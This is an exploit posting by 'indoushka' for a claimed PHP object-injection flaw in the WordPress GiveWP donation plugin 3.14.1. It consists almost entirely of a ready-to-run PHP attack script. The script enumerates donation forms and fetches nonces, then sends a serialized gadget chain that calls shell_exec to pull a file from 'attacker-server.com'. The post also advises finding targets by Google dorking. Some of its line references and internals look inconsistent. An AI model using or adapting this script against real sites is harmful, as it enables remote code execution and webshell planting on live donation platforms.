WordPress GiveWP Donation Fundraising Platform 3.14.1 Code Injection

=============================================================================================================================================| # Title     : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://givewp.com/                                                                                                         |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 78 set your file link.[+] Line 127. set your target.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass GiveWPExploit {    private $targetUrl;    private $headers;    public function __construct($targetUrl) {        $this->targetUrl = $targetUrl;        $this->headers = array(            'Content-Type: application/x-www-form-urlencoded'        );    }    public function check() {        $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array('action' => 'give_form_search'));        if (!$response || $response['http_code'] != 200) {            echo "Failed to retrieve form list.\n";            return false;        }        $forms = json_decode($response['body'], true);        if (empty($forms)) {            echo "No forms found.\n";            return false;        }        echo "Successfully retrieved form list. Available Form IDs: " . implode(', ', array_column($forms, 'id')) . "\n";        return $forms;    }    public function exploit() {        $forms = $this->check();        if (!$forms) {            return;        }        $selectedForm = $forms[array_rand($forms)];        $validForm = $this->retrieveAndAnalyzeForm($selectedForm['id']);        if (!$validForm) {            echo "Failed to retrieve a valid form for exploitation.\n";            return;        }        echo "Using Form ID: " . $validForm['give_form_id'] . " for exploitation.\n";        $this->sendExploitRequest($validForm);    }    private function retrieveAndAnalyzeForm($formId) {        $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array(            'action' => 'give_donation_form_nonce',            'give_form_id' => $formId        ));        if (!$response || $response['http_code'] != 200) {            return false;        }        $formData = json_decode($response['body'], true);        $giveFormId = $formId;        $giveFormHash = $formData['data'];        $givePriceId = '0'; // Default price ID        $giveAmount = '$10.00'; // Default amount        if (!$giveFormHash) {            return false;        }        return array(            'give_form_id' => $giveFormId,            'give_form_hash' => $giveFormHash,            'give_price_id' => $givePriceId,            'give_amount' => $giveAmount        );    }    private function sendExploitRequest($validForm) {        // URL of the malicious file to be fetched        $remoteFileUrl = 'http://attacker-server.com/malicious-file.php';        // Payload that uses file_get_contents to fetch the remote file        $payload = sprintf(            'O:19:"Stripe\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\Onboarding\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}}}}}}}',            strlen($remoteFileUrl),            $remoteFileUrl        );        $data = array(            'give-form-id' => $validForm['give_form_id'],            'give-form-hash' => $validForm['give_form_hash'],            'give-price-id' => $validForm['give_price_id'],            'give-amount' => $validForm['give_amount'],            'give_first' => 'Test',            'give_last' => 'User',            'give_email' => '[email protected]',            'give_title' => $payload,            'give-gateway' => 'offline',            'action' => 'give_process_donation'        );        $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', $data);    }    private function sendRequest($method, $url, $data) {        $options = array(            'http' => array(                'method' => $method,                'header' => implode("\r\n", $this->headers),                'content' => http_build_query($data)            )        );        $context = stream_context_create($options);        $result = file_get_contents($url, false, $context);        if ($result === false) {            return false;        }        return array(            'http_code' => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code            'body' => $result        );    }}// Usage$exploit = new GiveWPExploit('http://127.0.0.1');$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================